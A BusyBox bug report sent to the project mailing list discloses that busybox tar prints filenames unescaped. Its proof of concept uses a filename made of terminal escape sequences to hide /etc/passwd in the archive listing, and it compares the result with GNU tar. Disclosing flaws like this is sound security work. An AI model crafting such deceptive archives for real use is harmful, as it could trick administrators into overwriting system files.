[Bug 16018] New: busybox tar allows un-escaped filenames to be printed to stdout/stderr

bugzilla at busybox.net bugzilla at busybox.net
Wed Apr 3 14:02:42 UTC 2024


https://bugs.busybox.net/show_bug.cgi?id=16018

            Bug ID: 16018
           Summary: busybox tar allows un-escaped filenames to be printed
                    to stdout/stderr
           Product: Busybox
           Version: 1.30.x
          Hardware: All
                OS: All
            Status: NEW
          Severity: major
          Priority: P5
         Component: Other
          Assignee: unassigned at busybox.net
          Reporter: ian.norton at entrust.com
                CC: busybox-cvs at busybox.net
  Target Milestone: ---

It is possible to create an archive with filenames that are terminal escape
sequences and use this to hide other files from the file list or verbose
output.

The example output below is from running inside ubuntu 22.04 using busybox
1.30.1


root at 1f91a2b8747c:/tmp/hack# ls -l
total 0
-rw-r--r-- 1 root root 0 Apr  3 13:30
''$'\033''[1A'$'\033''[1Ksome-innocent-filename.txt'
-rw-r--r-- 1 root root 0 Apr  3 13:31  some-innocent-filename.txt
root at 1f91a2b8747c:/tmp/hack# busybox tar -cf ../bad.tar /etc/passwd $(echo -e
'\033[1A\033[1Ksome-innocent-filename.txt') some-innocent-filename.txt 
tar: removing leading '/' from member names

busybox will not report the etc/passwd item

root at 1f91a2b8747c:/tmp/hack# busybox tar -tf ../bad.tar 
some-innocent-filename.txt
some-innocent-filename.txt


GNU tar will correctly report the escaped version of each member

root at 1f91a2b8747c:/tmp/hack# tar -tf ../bad.tar 
etc/passwd
\033[1A\033[1Ksome-innocent-filename.txt
some-innocent-filename.txt


If a root user were to use busybox to untar files from / you could see how this
could be abused to unwittingly overwrite root files even if the listed the tar
content first.

-- 
You are receiving this mail because:
You are on the CC list for the bug.


More information about the busybox-cvs mailing list